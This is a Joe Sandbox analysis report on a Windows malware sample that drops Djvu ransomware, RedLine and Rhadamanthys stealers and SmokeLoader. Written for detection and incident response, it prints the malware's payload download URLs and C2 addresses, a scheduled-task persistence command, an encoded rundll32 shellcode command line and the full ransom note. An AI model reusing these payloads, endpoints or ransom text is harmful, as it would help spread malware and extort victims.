Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
aw9Ynwqd1x.exe

Overview

General Information

Sample Name:aw9Ynwqd1x.exe
Analysis ID:791295
MD5:b5c3c3d5eb5e6b5415ac4d87e3c46850
SHA1:9aa4014de1b622844ddfa4c7ddb17ae384289cd2
SHA256:b7948c22484bddce96a2713da0a6bda18cfd0487db9239ed0fd1790552d5e6b2
Tags:exeTeamBot
Infos:

Detection

Djvu, RHADAMANTHYS, RedLine, SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Detected unpacking (overwrites its own PE header)
Yara detected AntiVM3
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Yara detected RHADAMANTHYS Stealer
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected Djvu Ransomware
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Queries memory information (via WMI often done to detect virtual machines)
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal Bitcoin Wallet information
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Hides threads from debuggers
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
.NET source code references suspicious native API functions
Queues an APC in another process (thread injection)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
One or more processes crash
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Yara detected Keylogger Generic
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
PE file does not import any functions
Installs a raw input device (often for capturing keystrokes)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Allocates memory with a write watch (potentially for evading sandboxes)
Detected TCP or UDP traffic on non-standard ports
Contains capabilities to detect virtual machines
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Classification

  • System is w10x64
  • aw9Ynwqd1x.exe (PID: 1536 cmdline: C:\Users\user\Desktop\aw9Ynwqd1x.exe MD5: B5C3C3D5EB5E6B5415AC4D87E3C46850)
    • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • 336E.exe (PID: 1568 cmdline: C:\Users\user\AppData\Local\Temp\336E.exe MD5: 261B1DB94CCF4266128E2EB71A80FDA4)
        • schtasks.exe (PID: 3680 cmdline: "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 5080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • 2560.exe (PID: 2136 cmdline: C:\Users\user\AppData\Local\Temp\2560.exe MD5: 0A006808F7AA017CAF2DF9CE9E2B55A2)
        • 2560.exe (PID: 3152 cmdline: C:\Users\user\AppData\Local\Temp\2560.exe MD5: 0A006808F7AA017CAF2DF9CE9E2B55A2)
      • 226F.exe (PID: 5992 cmdline: C:\Users\user\AppData\Local\Temp\226F.exe MD5: EA25CE2F3580AF1DD771BAC5B0D2BF83)
        • ngentask.exe (PID: 816 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe MD5: ED7F195F7121781CC3D380942765B57D)
        • fontview.exe (PID: 4020 cmdline: C:\Windows\SYSWOW64\fontview.exe MD5: 218D53564FB0DD0CAFBBF871641E70F7)
          • rundll32.exe (PID: 5980 cmdline: "C:\Users\user\AppData\Roaming\nsis_uns5aa2a3.dll",PrintUIEntry |5CQkOhmAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8|AtBQPz8FP|AFoAeQBPAGL7AEEnAEMAaAA3|wBVAEsAZwBJ|i0CWUiD7CjoBP8CAABIg8Qow||MzMxMiUQkGP9IiVQkEEiJTPskCF0BSItEJDBvSIkEJIEBOEhvAL8ISMdEJBAtAet9DoEBEEiDwAGPAd0QgQFASDmWAHMl|p8DiwwkSAPISF+LwUiLTKsBVHsA|wPRSIvKigmI9wjrwWYFZUiLBPslYPPwM8lIi1D|GEg70XQ2SIP|wiBIiwJIO8L|dCpmg3hIGHX|GkyLQFBmQYPvOGt0BxERS3UI|hEQeBAudAVIi78A69VIi0j9AMH+agBAU1VWV0FUv0FVQVZBV10BZv+BOU1aTYv4TP+L8kiL2Q+F|P7z8ExjSTxBgTz|CVBFAAAPheq+8|BBi4QJiPPwhf|ASI08AQ+E1t5qEYO8CYwtAQ+E|cfz8ESLZyBEi|9fHIt3JESLT|8YTAPhTAPZSP8D8TPJRYXJD|uEpPPwTYvEQYv|EEUz0kgD04r|AoTAdB1BwcrvDQ++wPoAAUQD|dC|EXXsQYH6qv|8DXx0DoPBAf9Jg8AEQTvJc|9p68aLwQ+3DP9ORYssi0wD6+90WDPtqhB0UUH7ixTBANMzyYoCf0yLwusPwcnIEXsDyOUQAUGKANUQ|+0zwDP2QTsM+bbgEKYAg8YBg|j|CHLu6wpIi8v|Qf|VSYkE94P9xeQQxAQ7bxhy|a9mAUFfQV5BXb9BXF9eXVszF0jvgexgAWQAi+no|2b+||9IhcAPW4SYdSBMja8BiysQ38gz|+ibfSCNX|8ETI1FRjPSi9|L|1QkaIAgTIuv4A+Ea3UgRagQM|fAi9ORIEiJfCT1IKYgcIAgSIvwD|OES3UgpiBQSI1W|whEjUdASI2M|SSFEUiL2Oh8|a5+II1WSN4gEOIhzPbz8Ohn7yBEiwaN01cIQSCmIFjKIYmEaySAhxLe8|CLDtogj1iJjCRxEQcwkSDo7THvIIucLTJMi12|OkiD+2xIiiAw|0yJZCQ4TIuk7hoyTIlchAGEJNy2hxGGko0RjUdLMIz7JPDz8EmL1Ojp7fwFMIqceDJIjYT+eDJBgPMhjU9s90QwGKQCg+kBdffzgbx4MiFSZXi|dU2LhCT0IjGU+yT4NQHCSDvYcv84g|psdjNEjXtJQPoAlEG4AJgAeqYgQMoi+HQZRLYwvsAxSY1UJGyRIEnfg+hs6GuCMEiL|c6mIHhIhf90Es+LVUJMjjAbMUiN|0wkQP|XSIHEAHQhYSQtCC0B MD5: 73C519F050C20580F8A62C849D49215A)
            • dllhost.exe (PID: 4924 cmdline: C:\Windows\system32\dllhost.exe MD5: 2528137C6745C4EADD87817A1909677E)
              • Library.exe (PID: 4500 cmdline: "C:\Users\user\AppData\Local\Temp\Library.exe" MD5: EC5A11FC9A9CB3111AFA460FEC201D3D)
                • powershell.exe (PID: 4908 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAOQAwAA== MD5: 95000560239032BC68B4C2FDFCDEF913)
                  • conhost.exe (PID: 4044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • WerFault.exe (PID: 3304 cmdline: C:\Windows\system32\WerFault.exe -u -p 5980 -s 648 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • dbjigst (PID: 996 cmdline: C:\Users\user\AppData\Roaming\dbjigst MD5: B5C3C3D5EB5E6B5415AC4D87E3C46850)
  • svcupdater.exe (PID: 5684 cmdline: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe MD5: A4C9D357EA9C7679D978EB985F61E6C5)
  • svcupdater.exe (PID: 2636 cmdline: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe MD5: A4C9D357EA9C7679D978EB985F61E6C5)
  • cleanup
{"Download URLs": ["http://uaery.top/dl/build2.exe", "http://drampik.com/files/1/build3.exe"], "C2 url": "http://drampik.com/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-cud8EGMtyB\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0637JOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu01T\\/gszGuz7iKnpiRXv\\\\nGwWvl\\/ZhD6D24AJOT+SbHfvz6LGasPMGyfXmLe6Fo7e0cUtl3OwZeuwDkg4lB4eE\\\\nFp6tv8RPx3NAGJjylTPy7ZhLTxEuSD0YIP62Rs6Cek+fvfF53PxiGJhQuIxfvAVe\\\\nsFSNJ1+fNU92+JI5SRY0ZJdMezrQYJC7YY0onlwpLsiPbN5Osc6Jw2oabAVAS6rn\\\\nwQkW0GgIFh9e9trQc9Rdc5bf9X3s95J0jKg0TaTVFdw6RECS2cvRD1tZwc196EJ1\\\\nc5nBmBlLFWZqwkzVp4AORRnGGqz\\/OUTXiUmgNX+umpwUvdthK+7o1zc87nS20aU+\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----"}
{"C2 url": "89.208.103.88:37538", "Bot Id": "birj proliv", "Authorization Header": "9941068ef2768ed5ba54fc3eed22d795"}
{"C2 list": ["http://bulimu55t.net/", "http://soryytlic4.net/", "http://bukubuka1.net/", "http://novanosa5org.org/", "http://hujukui3.net/", "http://newzelannd66.org/", "http://golilopaster.org/"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      0000000D.00000002.402603602.0000000002C30000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      0000000F.00000002.362651886.0000000004A00000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
        0000000F.00000002.362651886.0000000004A00000.00000040.00001000.00020000.00000000.sdmpWindows_Ransomware_Stop_1e8d48ffunknownunknown
        • 0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
        • 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
        00000011.00000002.363362004.0000000000400000.00000040.00000400.00020000.00000000.sdmpSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
        • 0xe23ea:$s1: http://
        • 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
        • 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
        • 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
        • 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
        • 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF
        • 0xe23ea:$f1: http://
        00000011.00000002.363362004.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
          Click to see the 48 entries
          SourceRuleDescriptionAuthorStrings
          16.3.226F.exe.d030000.0.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            16.3.226F.exe.d030000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
            • 0x1a468:$pat14: , CommandLine:
            • 0x134a1:$v2_1: ListOfProcesses
            • 0x13280:$v4_3: base64str
            • 0x13e03:$v4_4: stringKey
            • 0x11b63:$v4_5: BytesToStringConverted
            • 0x10d76:$v4_6: FromBase64
            • 0x12098:$v4_8: procName
            • 0x12813:$v5_5: FileScanning
            • 0x11d6c:$v5_7: RecordHeaderField
            • 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
            18.2.ngentask.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              18.2.ngentask.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
              • 0x1a468:$pat14: , CommandLine:
              • 0x134a1:$v2_1: ListOfProcesses
              • 0x13280:$v4_3: base64str
              • 0x13e03:$v4_4: stringKey
              • 0x11b63:$v4_5: BytesToStringConverted
              • 0x10d76:$v4_6: FromBase64
              • 0x12098:$v4_8: procName
              • 0x12813:$v5_5: FileScanning
              • 0x11d6c:$v5_7: RecordHeaderField
              • 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
              17.2.2560.exe.400000.0.raw.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
              • 0xe23ea:$s1: http://
              • 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
              • 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
              • 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
              • 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
              • 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF
              • 0xe23ea:$f1: http://
              Click to see the 30 entries
              No Sigma rule has matched
              Timestamp:109.206.243.168192.168.2.380497352853001 01/25/23-09:43:38.668137
              SID:2853001
              Source Port:80
              Destination Port:49735
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3109.206.243.16849736802853002 01/25/23-09:44:09.970426
              SID:2853002
              Source Port:49736
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3109.206.243.16849760802853002 01/25/23-09:44:49.715501
              SID:2853002
              Source Port:49760
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.389.208.103.8849733375382043231 01/25/23-09:43:35.518560
              SID:2043231
              Source Port:49733
              Destination Port:37538
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3109.206.243.16849735802043202 01/25/23-09:43:38.621799
              SID:2043202
              Source Port:49735
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.389.208.103.8849733375382043233 01/25/23-09:43:14.099188
              SID:2043233
              Source Port:49733
              Destination Port:37538
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:89.208.103.88192.168.2.337538497332043234 01/25/23-09:43:16.162357
              SID:2043234
              Source Port:37538
              Destination Port:49733
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: http://tempuri.org/Entity/Id19ResponseonURL Reputation: Label: phishing
              Source: http://tempuri.org/Entity/Id19ResponseonURL Reputation: Label: phishing
              Source: http://drampik.com/lancer/get.phpAvira URL Cloud: Label: malware
              Source: C:\Users\user\AppData\Local\Temp\Library.exeAvira: detection malicious, Label: HEUR/AGEN.1250389
              Source: aw9Ynwqd1x.exeReversingLabs: Detection: 84%
              Source: aw9Ynwqd1x.exeVirustotal: Detection: 65%Perma Link
              Source: potunulit.orgVirustotal: Detection: 11%Perma Link
              Source: http://drampik.com/lancer/get.phpVirustotal: Detection: 11%Perma Link
              Source: 89.208.103.88:37538Virustotal: Detection: 5%Perma Link
              Source: C:\Users\user\AppData\Local\Temp\226F.exeReversingLabs: Detection: 43%
              Source: C:\Users\user\AppData\Local\Temp\226F.exeVirustotal: Detection: 39%Perma Link
              Source: C:\Users\user\AppData\Local\Temp\2560.exeReversingLabs: Detection: 66%
              Source: C:\Users\user\AppData\Local\Temp\336E.exeReversingLabs: Detection: 80%
              Source: C:\Users\user\AppData\Local\Temp\5898187.dllReversingLabs: Detection: 18%
              Source: C:\Users\user\AppData\Roaming\dbjigstReversingLabs: Detection: 84%
              Source: C:\Users\user\AppData\Roaming\nsis_uns5aa2a3.dllReversingLabs: Detection: 61%
              Source: aw9Ynwqd1x.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\2560.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Roaming\dbjigstJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\336E.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\5898187.dllJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\Library.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\226F.exeJoe Sandbox ML: detected
              Source: 0000000F.00000002.362651886.0000000004A00000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Djvu {"Download URLs": ["http://uaery.top/dl/build2.exe", "http://drampik.com/files/1/build3.exe"], "C2 url": "http://drampik.com/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-cud8EGMtyB\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0637JOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Wi
              Source: 0000000D.00000002.403573170.0000000004921000.00000004.10000000.00040000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://bulimu55t.net/", "http://soryytlic4.net/", "http://bukubuka1.net/", "http://novanosa5org.org/", "http://hujukui3.net/", "http://newzelannd66.org/", "http://golilopaster.org/"]}
              Source: 00000010.00000003.469890360.00000000016EB000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": "89.208.103.88:37538", "Bot Id": "birj proliv", "Authorization Header": "9941068ef2768ed5ba54fc3eed22d795"}

              Compliance

              barindex
              Source: C:\Users\user\AppData\Local\Temp\336E.exeUnpacked PE file: 14.2.336E.exe.400000.0.unpack
              Source: C:\Users\user\AppData\Local\Temp\2560.exeUnpacked PE file: 17.2.2560.exe.400000.0.unpack
              Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49749 version: TLS 1.0
              Source: aw9Ynwqd1x.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\aw9Ynwqd1x.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
              Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49730 version: TLS 1.2
              Source: Binary string: wkernel32.pdb source: fontview.exe, 00000013.00000003.386062019.0000000005086000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.386284855.00000000051A0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: WINMMBASE.pdbUGP source: fontview.exe, 00000013.00000003.421038965.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdb source: fontview.exe, 00000013.00000003.395722778.0000000005088000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msvcrt.pdb source: fontview.exe, 00000013.00000003.389771646.0000000005150000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wrpcrt4.pdb source: fontview.exe, 00000013.00000003.391168128.0000000005150000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: fontview.exe, 00000013.00000003.385093474.00000000053B0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.383912006.0000000005084000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: shcore.pdb source: fontview.exe, 00000013.00000003.406207334.0000000005084000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.406327938.0000000005110000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000018.00000003.490751661.000002275D660000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wwin32u.pdbGCTL source: fontview.exe, 00000013.00000003.401619984.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: bcryptprimitives.pdbUGP source: fontview.exe, 00000013.00000003.391810335.0000000005000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\zetoxu68-vepibayawu-woxixawenobaju_93\fucabopiso_d.pdbp source: aw9Ynwqd1x.exe, 00000000.00000000.246785291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, dbjigst, 0000000D.00000000.336022819.0000000000401000.00000020.00000001.01000000.00000008.sdmp
              Source: Binary string: _C:\fepovilorefego5.pdb source: explorer.exe, 00000001.00000003.337271065.00000000082B0000.00000004.00000001.00020000.00000000.sdmp, 336E.exe, 0000000E.00000000.336659529.0000000000401000.00000020.00000001.01000000.00000009.sdmp
              Source: Binary string: wgdi32.pdb source: fontview.exe, 00000013.00000003.392076418.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: setupapi.pdbUGP source: fontview.exe, 00000013.00000003.423766732.00000000059F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.421577482.00000000055B2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: fltLib.pdb source: fontview.exe, 00000013.00000003.419420089.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: advapi32.pdb source: fontview.exe, 00000013.00000003.388608530.0000000005080000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wsspicli.pdb source: fontview.exe, 00000013.00000003.391685317.0000000003600000.00000004.00001000.00020000.00000000.sdmp
